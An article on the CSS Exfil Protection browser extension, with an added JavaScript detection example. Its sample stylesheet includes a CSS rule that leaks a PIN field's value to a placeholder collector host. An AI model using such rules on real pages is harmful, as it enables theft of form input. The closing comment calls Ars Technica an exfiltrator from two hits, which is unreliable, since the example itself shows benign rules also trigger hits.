CSS Exfil Protection is an extension for the Firefox and Chrome browsers that claims to block malicious CSS code that could be used to leak your data. It blocks imported or remotely linked CSS code that could be secretly capturing the data entered in various fields of a webpage.
While completely turning off CSS is neither possible nor desirable, CSS Exfil Protection can selectively block attempts to load CSS code from a remote location. After installation, it monitors every webpage that you open and scans the loaded CSS code for suspicious items. When such items are detected, it blocks them and shows the number of blocked items on the toolbar icon.
This extension was created by Mike Gualtieri, and you can read more about how CSS data leaks work on his blog. He has also provided some PoC examples and a browser tester webpage. When you visit this webpage, it performs four different types of tests to see whether your web browser is protected against CSS-based data leaks.
Unfortunately, the extension does not provide any configurable options to the end user. You cannot whitelist a website to stop the extension from blocking CSS on it. Furthermore, it assumes that remote fetching of data through CSS is malicious, which means that even harmless websites with harmless CSS are given the same treatment as possibly rogue webpages with malicious CSS code.
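The scan-and-flag behaviour described above, and the reason harmless pages also get hits, can be seen in a small scanner. This is an added example, not the extension's own code and not part of the original article: the heuristic (a selector that tests an attribute value combined with a remote `url()` load), the name `findSuspiciousRules` and the hosts in the sample stylesheet are assumptions made for illustration.

```javascript
// Added example (not the extension's source). Assumed heuristic: a rule is
// suspicious when its selector tests an attribute *value* and its
// declarations fetch a remote URL.
const ATTR_VALUE = /\[\s*[\w-]+\s*(?:[\^$*~|]?=)\s*[^\]]+\]/;
const REMOTE_URL = /url\(\s*['"]?\s*(?:https?:)?\/\//i;

function findSuspiciousRules(cssText) {
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  const hits = [];
  const rule = /([^{}]+)\{([^{}]*)\}/g; // innermost "selector { body }" blocks
  let m;
  while ((m = rule.exec(css)) !== null) {
    const selector = m[1].trim();
    const body = m[2];
    if (selector.startsWith("@")) continue; // @font-face etc. carry no selector
    if (ATTR_VALUE.test(selector) && REMOTE_URL.test(body)) {
      hits.push(selector);
    }
  }
  return hits;
}

// Constructed sample stylesheet; all hosts are placeholders.
const SAMPLE_CSS = `
/* value-dependent remote load: the request reveals part of the field value */
input[name="pin"][value^="1"] { background: url(https://collector.example/1); }
/* common, harmless pattern: icon for external links served from a CDN */
a[href^="http"] { background: url(//cdn.example/external.svg) no-repeat; }
/* attribute selector but local resource: not flagged */
a[href$=".pdf"] { background: url(/img/pdf.png); }
/* remote resource but no attribute selector: not flagged */
@media screen { .hero { background-image: url("https://cdn.example/hero.jpg"); } }
`;

console.log(findSuspiciousRules(SAMPLE_CSS));
```

The second hit is a benign rule, which is why a hit count on a well-known site does not by itself show that the site is leaking data.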
You can get CSS Exfil Protection extension for Firefox and Chrome from https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense.
Got 2 hits on: https://arstechnica.com/ Their page is certainly trying to exfil data.